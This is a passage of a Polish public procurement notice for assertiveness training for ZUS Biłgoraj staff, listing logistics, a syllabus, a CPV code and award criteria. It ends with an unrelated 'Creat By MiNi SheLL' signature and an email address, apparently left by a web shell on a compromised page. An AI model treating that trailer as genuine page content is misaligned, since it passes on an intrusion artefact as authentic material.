9)	środek transportu dla uczestników na szkolenie (z siedziby O/ZUS w Biłgoraju, ul. Kościuszki 103) i ze szkolenia (do siedziby O/ZUS w Biłgoraju, ul. Kościuszki 103)   
10)	ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników szkolenia 
11)	miejsce organizacji szkolenia w miejscowości oddalonej nie więcej niż 150 km od siedziby zamawiającego
12)	po zakończeniu szkolenia certyfikaty/zaświadczenia dla wszystkich uczestników szkolenia,
4.	Wymagane minimum programowe szkolenia:
a)	Pojęcie i istota funkcjonowania asertywności.
b)	Komunikacja a asertywność.
c)	Techniki kształtowania zachowań asertywnych.
d)	Asertywne wyrażanie oczekiwań.
e)	Budowanie świadomości własnego potencjału w zakresie sposobów komunikacji i asertywności.
f)	Asertywne reakcje na trudne sytuacje w kontakcie z klientem.
g)	Efektywna komunikacja ze współpracownikami i klientami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com